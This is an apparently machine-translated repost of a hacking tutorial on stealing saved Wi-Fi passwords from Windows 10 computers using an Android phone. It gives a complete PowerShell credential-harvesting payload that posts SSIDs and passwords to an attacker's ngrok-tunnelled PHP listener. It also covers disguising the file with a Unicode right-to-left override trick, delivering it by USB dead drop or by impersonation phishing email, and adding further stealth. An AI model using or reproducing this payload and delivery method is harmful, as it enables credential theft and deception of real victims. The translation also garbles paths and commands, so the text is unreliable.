قالب وردپرس درنا توس
Home / Tips and Tricks / How to Exfil WPA2 Wi-Fi Passwords with Android & PowerShell «Zero Byte :: WonderHowTo

How to Exfil WPA2 Wi-Fi Passwords with Android & PowerShell «Zero Byte :: WonderHowTo



It's easier than you might think hacking into Wi-Fi routers with just a worried Android phone. Broken hold is not needed. And you don't even have to spend a penny. This method does not require a Windows operating system to convert PowerShell scripts to EXE format, a reliable VPS for intercepting hacked Wi-Fi passwords or Metasploit for tricks after exploitation.

How this Wi-Fi hack works

UserLAnd is a free Android app that allows you to install Kali or Debian with Android OS ̵

1; without rotating the device.

But traditional Wi-Fi hacking tools like Aircrack-ng do not work with UserLAnd. To run Airodump-ng, you need to change Android's wireless interface in the display mode. This requires root access, which UserLAnd does not have. Although it could be configured to capture a WPA2 handshake, the brute-force password with an Android CPU would take an inexplicable time. It's just not practical.

There is still more than one way to compromise a Wi-Fi password. The special method in this guide requires little reconnaissance and social technology. UserLAnd Kali OS is used to create a PowerShell payload that is designed to filter out saved Wi-Fi passwords in Windows 10. The download will then have its file extension spoofed with Unicode to hide its true file type.

In Kali (on Android), a local PHP server is created to listen to Wi-Fi passwords sent from the target computer. To bypass port forwarding and firewalls, Ngrok is used to make the local PHP server accessible to the entire Internet, allowing targets to send Wi-Fi passwords from the computer to the PHP server running locally.

There's everything there for that. The tricky part is getting the goal to click on the malicious PowerShell payload, which is deepened in a later part of the article.

Getting Started with UserLAnd

Before you move forward, check out the Distortion guide on turning an Android phone into a non-root chopping unit, as it covers the UserLAnd base and gets everything you need to follow below. You must install and configure UserLAnd, create a new file system and connect to the operating system via SSH with ConnectBot (or JuiceSSH or the built-in SSH client).

Step 1: Installing Essential Software

Be sure to update the system and install the necessary software first, as indicated in the main UserLAnd article. Then we can start installing the new tools needed, especially Unzip and PHP.

To install Unzip, use the command sudo apt-get install unzip .

  apt-get install unzip 
  Reading package list ... Ready
Building dependency tree
Reads state information ... Ready
Suggested packages:
zipper
The following new packages will be installed:
unpack
0 upgraded, 1 newly installed, 0 to delete and 0 not upgraded.
Need to get 156 KB archives.
After this operation, 518 kB of additional disk space will be used.
Get: 1 http://kali.download/kali kali-rolling / main arm64 unzip arm64 6,0-21 [156 kB]
Fetched 156 KB in 6s (24.5 KB / s)
debconf: Packet configuration delay, because apt-utils is not installed
E: Setting in Start via TCSAFLUSH for stdin failed! - tcsetattr (13: Permission denied)
Selects previously unselected package unzip.
(Reading database ... 13159 files and directories currently being installed.)
Preparing to Unpack ... / unzip_6.0-21_arm64.deb ...
Unzip Unpack (6.0-21) ...
Setting Unzip (6.0-21) ... 

Before installing PHP, use apt-mark hold apache * to hold back some of the Apache web server packages that are automatically downloaded when you install PHP. This prevents APT from installing user-friendly Apache binaries and services, making the following PHP installation process a little faster.

  apt-mark hold apache * 
  apache2 put on hold.
Apache users paused.
apache2 bin in standby mode.
apache2 dataset in standby mode.
apache2 utils put on hold.
apache2-doc put in standby mode.
apache2-suexec pristine was on hold.
apache2-suexec custom set to standby.
apache2-dbg set to standby.
apache2-dev was in standby mode.
apache2-ssl-dev in standby mode.
apachedex put in standby mode.
apached on hold.
apachetop set a hold. 

To install PHP, use the command apt-get install php .

  apt-get install php 

 Build dependency tree
Reads state information ... Ready
The following additional packages will be installed:
bzip2 file libapparmor1 libargon2-1 libicu63 libmagic-mgc libmagic1 libsodium23 libxml2 mime-support php-common php7.3 php7.3-clk php7.3-common php7.3-fpm php7.3-json
php7.3-opcache php7.3-readline psmisc xz-utils
Suggested packages:
bzip2-doc php-pear
The following new packages will be installed:
bzip2 file libapparmor1 libargon2-1 libicu63 libmagic-mgc libmagic1 libsodium23 libxml2 mime-support php php-common php7.3 php7.3-clp php7.3-common php7.3-fpm php7.3-json
php7.3-opcache php7.3-readline psmisc xz-utils
0 upgraded, 21 recently installed, 0 to delete and 0 not upgraded.
The need to get a 13.6 MB archive.
After this operation, 58.7 MB of additional disk space will be used.
Do you want to continue? [Y/n] 

Restart your Android device to make sure all package and kernel updates come into effect the next time Android launches in UserLAnd Kali OS.

Step 2: Set up the PHP server

After Android restarts, UserLAnd launches the app and SSH to the new Kali system.

The screen is a program that allows you to manage multiple terminal sessions within the same console. In this case, we are talking about the same Android device. The screen has the option of "unloading" or closing the terminal window without losing data running in the terminal.

You are asked to learn how to use the Screen as it is easy to navigate between multiple terminal sessions without losing data [19659000] To start a new screen session, just type screen .

  screen 

Then use su to enter a root shell.

  su 

] Create a directory called "phpServer /" with the command below mkdir .

  mkdir phpServer / 

Change to the phpServer / directory with the command cd .

  cd phpServer / 

Then create a file called "index.php" with nano .

  nano index.php 

Paste the PHP script below into the nano terminal. Clearly, to save and leave the nano-terminal, press [Ctrl-x then then Specify .

Recommended on Amazon: ] FAVI Mini Bluetooth keyboard with laser pointer and backlit keys


     PHP Server 
   
      

It works!

This simple PHP script can intercept data and does not need to be altered in any way to work. When Windows 10's target sends its Wi-Fi data, this PHP server saves passwords with the date as a file name and ".credz" as a file extension.

Finally, start the PHP server using php -S 0.0.0.0:80 command. -S tells PHP to start a web server, while 0.0.0.0 says it should host the server on each interface. 80 is the listening port number. By default, all web servers and browsers use port 80 with HTTP servers.

  php -S 0.0.0.0:80
PHP 7.3.0-2 Development Server started
Listening to http://0.0.0.0:80
The document root is / home / user / phpServer
Press Ctrl-C to exit. 

To terminate or delete from the screen set without stopping the PHP server, press Ctrl-a then d ].

Step 3: Verify the PHP server works

Now there are two ways to verify that PHP is still running in the background. First, use curl to send the PHP server some data to mimic the Wi-Fi password sent to the server.

  curl data "password: qwerty12345" http://127.0.0.1:80 

Then ls the phpServer / directory to find the newly created .credz file.

  ls -l phpServer / 
  -rw-r - r--. 1 rot rot 217 jan 9 00:10 index.php
-rw-r - r--. 1 root root 0 Jan 9 00:15 0900151501.credz 

And cat file to read the content.

  cat phpServer / *. Credz 
  password: qwerty12345 

Another way To verify that the server is working, the netstat command works and the Android browser.

  netstat -luptn | grep -i php 
  tcp 0 0 0.0.0.0:2080 0.0.0.0:* LISTEN 14128 / php 

Message PHP listens to port 2080, not 80 as specified in the previous PHP command. For some reason, when you open ports in UserLAnd operating systems, number 20 is upgraded. It is not entirely clear why this is happening, but it is not important because the Ngrok server is not affected by this.

Open an Android browser and navigate to 127.0.0.1:2080 and you should get a "It works!" message.

If the above netstat command does not return any output, the PHP server was not started correctly or the Screen session was deleted incorrectly. Go back to step 3 and try again or leave a comment below for further guidance.

Step 4: Creating an Ngrok Account

Ngrok is an excellent service for web developers who want to demo their website and test web applications without managing firewalls or complex server management. It allows users to create a domain name that links to an internal or private server. This allows developers to quickly test their websites by making the server public to the entire internet temporarily.

However, there is a great approach to using Ngrok that I did not mention earlier. Free Ngrok accounts have limitations that can create an obstacle with this hack. Once the Ngrok server has started, it randomly generates the URL and free accounts may not use or customize URLs. Remember that the generated URL must be hard-coded in the PowerShell payload, so if the Ngrok server is stopped, the URL can never be re-allocated.

When the URL is generated and hardcoded in the payload, the Ngrok server cannot be closed under Circumstances or the target's Wi-Fi password is sent to a URL that no longer exists – and worse, the URL cannot be used again. In short, do not stop the Ngrok server until the target's Wi-Fi password has been recorded.

To get started with Ngrok, open a web browser and navigate to the registration page to create an account.

Step 5: Download and install Ngrok

SSH in the Kali file system and create a new screen set.

  screen  su ] to indicate a root shell. 

  su 

Then use the wget command to download the Ngrok zip. In this writing, version 2.2.8 is the latest. Proceed to Ngrok's download page to search for a later version.

  wget "https: //bin.equinox.io/a/nmkK3DkqZEB/ngrok-2.2.8-linux-arm64.zip' 
 - 2019-01-06 04: 39: 30-- https://bin.equinox.io/a/nmkK3DkqZEB/ngrok-2.2.8-linux-arm64.zip
Solution of bin.equinox.io (bin.equinox.io) ... 34.226.180.131
Connect to bin.equinox.io (bin.equinox.io) | 34.226.180.131 |: 443 ... connected.
HTTP request sent, waiting for reply ... 200 OK
Length: 5063444 (4.8 M) [application/octet-stream]
Save to: & nbsp; ngrok-2.2.8-linux-arm64.zip & # 39;

ngrok-2.2.8-linux-arm64.zip 100% [==============>] 4.83M 293KB / s in the 16th

2019-01-06 04:39:52 (306 KB / s) - & # 39; ngrok-2.2.8-linux-arm64.zip & # 39; saved [5063444/5063444] 

Next, unzip download. [19659013] unzip ngrok-2.2.8-linux-arm64.zip

  Archive: ngrok-2.2.8-linux-arm64.zip
inflation: ngrok 

List files in the directory to find the new binary Ngrok.

  total 20328
-rwxr-xr-x. 1 rot rot 15747855 Jul 15, 2017 ngrok
-rw-r - r--. 1 root root 5063444 Jan 6 04:39 ngrok-2.2.8-linux-arm64.zip 

Configure Ngrok to use the authtoken provided after registration. This gives access to the account only functions and allows Ngrok servers to associate the local PHP server with your Ngrok account. To do this, use the command below ngrok with the argument .

  ./ ngrok authtoken YourNgrokAuthTokenHere 
  Authtoken saved in the configuration file: /root/.ngrok2/ngrok .19l 

For more on how Ngrok works and available arguments, check out its official documentation.

Step 6: Starting the Ngrok Tunnel

To make the PHP server available to the public, use the below ngrok command.

  ./ ngrok http 80 

At this time, I experienced an annoying bug that caused Ngrok to fail and the entire Android screen would be completely empty. It is unclear whether this is a bug in Ngrok binary, Screen, ConnectBot, UserLAnd or anything else. If you use the built-in SSH or JuiceSSH instead of ConnectBot and this does not happen it may be.

If the screen becomes unresponsive when you run the above command ngrok press Ctrl-c to cancel the previous command. Then press Ctrl-d to end the screen session. You need to create a new screen task, enter a root shell and run the command ngrok again. Simply continues to try until it works. If anyone detects the cause or solution for the problem, please leave a comment below.

If the Ngrok command was successful, note the forwarding address that it needs to be added under PowerShell payload. Then, interrupts the screen session without stopping the Ngrok server by pressing Ctrl-a then d .

  Session Status Online
Account XXXXX XXXXXXXX (Common: Free)
version 2.2.8
US Interface (US)
Forwarding http://XXXXXXX.ngrok.io -> localhost: 80
Forwarding https://XXXXXX.ngrok.io -> localhost: 80

Connections to OPN RT1 RT5 p50 p90
0 0 0.00 0.00 0.00 0.00 

Step 7: Verify that the Ngrok tunnel works

After removing from the screen session, verify Ngrok and PHP works using the command below curl to send the servers some data. Remember to change the "SUBDOMAIN" in the Ngrok URL to your forwarding address.

  curl - data "ngrok works!" & # 39; http: //SUBDOMAIN.ngrok.io' 

     PHP Server 
   
      

It works!

Curl should return multiple rows of HTML if data was successfully sent. Use cat to read the newly created .credz file in the phpServer / directory.

  cat phpServer / *. Credz 
  ngrok works! 

Step 8: Create PowerShell Payload

] To quickly repeat, we have a PHP server running locally in the background to listen to Wi-Fi passwords sent from the target device. There is also an Ngrok service running in the background that allows the PHP server to be available to the entire Internet without exposing the IP address to our Android device.

Now we have to create payloads that are shared with the target. Here's how the PowerShell payload looks:

  Add-Type -AssemblyName System.Web;

$ ngrokServer = "http://SUBDOMAIN.ngrok.io/index.php";

foreach ($ path i [System.IO.Directory] :: EnumerateFiles ("C: ProgramData, Microsoft Wanscv Files", "*. xml", "AllDirectories"))

Try {
$ oXml = New object System.XML.XMLDocument;
$ OXml.Load ($ path);
$ ssid = $ oXml.WLANProfile.SSIDConfig.SSID.Name;
$ netinfo = netsh.exe wlan displays profiler name = "$ ssid" key = clear;
$ pass = (($ netinfo | Select-String -Pattern "Key Content") split ":") [1] .Trim ();
$ sendData + = "SSID:" + ($ ssid) + "+" + "PASSWORD:" + ($ pass) + "` n`n ";
} catch {}

}

Invoke-WebRequest -Uri $ ngrokServer -Method "POST" -Body $ sendData; 

The PowerShell script passes through all of the Wi-Fi network names (SSIDs) stored on the computer (found in the XML documents in "C: ApplicationsData Microsoft Wcv Files" directory) and runs the command netsh for each SSID to drag the Wi-Fi passwords into plain text (labeled "Key Content").

It then analyzes the netsh output and takes the detected Wi-Fi SSIDs and passwords, merges them into the variable "$ sendData" and sends them to the Ngrok server.

To better understand how netsh is used, let us quickly look at a copy of a copy. If you have a Windows 10 computer, you can type the command below netsh in a command prompt to see stored Wi-Fi passwords.

  netsh wlan view profiles name = "SSID HERE" key = clear 

The command netsh will produce a bunch of information related to the Wi-Fi network, but most of it is useless to an attacker. Scroll down a little to the "Key Content" line that displays the Wi-Fi password in plain text. Below is an example of a netsh output.

And here's the same PowerShell payload in one-liner format:

  powershell -ExecutionPolicy Bypass "Add-Type" command AssemblyName System.Web; $ ngrokServer = "http: //SUBDOMAIN.ngrok.io/index.php"; foreach ($ path in [System.IO.Directory] :: EnumerateFiles ("C: ProgramData Profiles "," * .xml "," AllDirectories ")) {try {$ oXml = New object System.XML.XMLDocument; $ oXml.Load ($ path); $ ssid = $ oXml.WLANProfile.) SSIDConfig.SSID.Name; $ netinfo = netsh.exe wlan view profiler name = "$ ssid" key = clear; $ pass = (($ netinfo | Select-String -Pattern "Key Content") splitter ":") [1] .Trim (); $ sendData + = "SSID:" + ($ ssid) + "+" + "PASSWORD:" + ($ pass) + " `n`n";} catch {}}; Invoke-WebRequest -Uri $ ngrokServer -Method "POST" -Body $ sendData; " 

The one format format is required because it will be saved in a .bat file e and executed as a single line. This one file should be saved in / sdcard / Download / directory with the .bat file extension. The download / directory will make the payload available for Android OS for further manipulation.

  nano /sdcard/Download/payload.bat

In the payload, remember to change "SUBDOMAIN" to match your Ngrok forwarding address before saving the file. In my experiments, the HTTPS forwarding address did not work with the PHP server on port 80. Use the HTTP forwarding address, not HTTPS.

Step 9: Spoof BAT extension

Spoofing extension has been covered on Null byte before. Check out " Hack WPA2 Wi-Fi password using USB Dead Drops" for an in-depth explanation.

I use the file name "payloadfdp.bat" to make this article easier to follow. In a real scenario, the file name should resemble something like "passwordtxt.bat" or "secretfdp.bat" to create some sense of legitimacy. Be creative here when the social engineering goal.

Use a preferred Android browser, navigate to the Unicode Table and copy the RLO character "Right-to-Left Override" (RLO). Then open the Android download app, rename payload.bat and paste the RLO character to reverse the order in which the characters appear in the file name.

Remember that the characters actually not returned. How Android and Windows 10 shows characters are reversed. Windows 10 will still recognize the .bat file extension and perform it as such.

Step 10: Deliver payload

With all the things established, the payload can now be delivered to the target. There are two possible delivery methods described below, but this is far from an exhaustive list. Other tactics may be possible if more is known about the target.

Option 1: USB Dead Drop

USB death drops will not be possible for some of you but are very reliable. It requires you to have some form of OTG adapter to connect the USB flash drive to your Android device. The redemption would be copied to the USB device and strategically placed somewhere for the goal to find.

Instead of an OTG adapter, however, there are flash drives with both USB-C and USB 3.1 terminals that can be connected to both an Android and a computer. There are also dual USB flash drives with both Micro USB and USB 3.0 terminals, for those who have older devices.

Samsung Duo Plus 128GB – 300MB / s USB 3.1 Flash Drive: Amazon | Best Buy | Walmart

Again, this hack is meant to be a 100% free method, so if you don't already have an OTG adapter and / or a suitable USB flash drive, you're willing to lose, then this option won't work . Of course, if you don't mind spending money, you can buy some of the items mentioned above.

Those of you with an OTG cable and / or a USB USB device can check out "Hack WPA2 Wi-Fi Password Using USB Dead Drops" for more on the social engineering aspects of USB death.

Option 2: Email extension

Email delivery may require email address verification. Based on how much information is known about the target, it may alternatively be possible to create a new Gmail account with the name and profile picture of one of the target's friends, relatives or co-workers. For example, an email from the target manager or relative asks them to open an attached PDF – the attached PDF is the PowerShell payload created in step 7.

When submitting the e-pay payload, it is important to you first zip file. Otherwise, the spoofed file name (containing Unicode) broken in the target browser is displayed and likely causes them to suspect email and attachment (shown below).

The Chrome browser is downloaded by .bat with Unicode in the file name.

To add the zip file when it contains Unicode, open the Download app, choose payload.bat and press the "Compress" button. By default, the Android RLO uses the Unicode character in the zip file name – which we don't want. Find the most recently created file, it will have the .pdf file extension. Note "piz" in the file name. It is zip backwards thanks to the RLO Unicode character. Select the file and rename it to "compressed.zip" to change it.

When the target extracts the compressed file it will produce payload.bat with the RLO Unicode character intact and spoofed extension.

Step 11: Access the hacked Wi-Fi references

When the target clicks on the payload, Windows 10 sends all saved Wi-Fi password for your Ngrok server. Ngrok then instantly sends further credentials to the local PHP server on your Android device.

To see the hacked passwords, simply the cat .credz files in phpServer / directory.

  cat ~ / phpServer / *. credz 
  SSID: NETGEAR77
PASSWORD: smoothebreeze161

SSID: DeathStar
PASSWORD: UseTheForceDude!

SSID: Get your own wifi
PASSWORD: 6 (CHO-48Qm6% ae2-7.V4 

Step 12: Improve this attack (Optional)

There is much that can be done to improve the efficiency of such remote attacks. Hopefully, we describe some of the potential improvements get you on a path to develop this attack and thereby increase the chances of success.

CMD Pop-Up

When you click on .bat PowerShell payload, the goal will be presented with a very obvious terminal pop-up. cannot be suppressed (when using .bat format) and will remain on the screen for several seconds depending on how many Wi-Fi passwords they have been saved on the computer.More Wi-Fi passwords mean a longer pop-up time .

This is a dead giveaway that the payload is a malicious file. Plus, when the batch has been run, the target will probably not have more than a few seconds to stop it before all passwords have been sent to the Ngrok server. tealth is not critical to the success of the attack, .bat payload will serve its purpose.

Lack of Obfuscation

PowerShell payload is sent to the target in plain text. There is no bas64 encoding or encryption involved to encrypt or hide the code. Even non-technically savvy targets will be able to identify the Ngrok URL and see the command "Invoke-WebRequest" and "PASSWORD" in the payload. It is very obvious that something is very strange going on. Such attacks will usually result in immediate discovery.

Payment icon

There are some advantages and disadvantages to using .bat files as a payload mechanism. They make it very easy to execute PowerShell scripts and bypass antivirus programs, but unlike EXE and SCR file extensions, there is no way to spoil the file icon. The default.bat icon is apparently not a text file or a PDF file. This can cause suspicion in the target and cause them to delete the file.

Lack of social technology

The powerful PowerShell payload is very simple. It iterates through saved Wi-Fi passwords and sends them to the attacker's server – nothing more. In a real scenario, there should be some code to open a text file or open a PDF to get the goal to believe that the file is what it says it is. There must be some form of user-based social technology to prevent the target from becoming aware that something cruel happens just in front of them. Such degrees of social technology can go along the way to prevent detection when driving a payload on a target computer.

Conclusion

This hack is far from foolproof. More can be done to hide the payload so that it acts as a regular file, and the delivery methods require some targeted social technology to work. However, it shows how some simple techniques can be combined to compromise on a Windows 10 machine and filter out the desired information.

All software and steps used in this article were completely executed on a single Android phone. It's an Android phone that runs a Debian operating system, hosts two types of web servers and some PowerShell code to get it all together.

Get ready for future articles where I'll show more fun picks that can be done with just one Android device. If you had this article, follow me on Twitter @ tokyoneon_ and GitHub to keep up with my current projects. For questions and concerns, leave a comment below or let me know on Twitter.

Don't miss: Easily discover CVEs with Nmap Scripts

Cover photo and screenshots of tokyoneon / Zero byte




Source link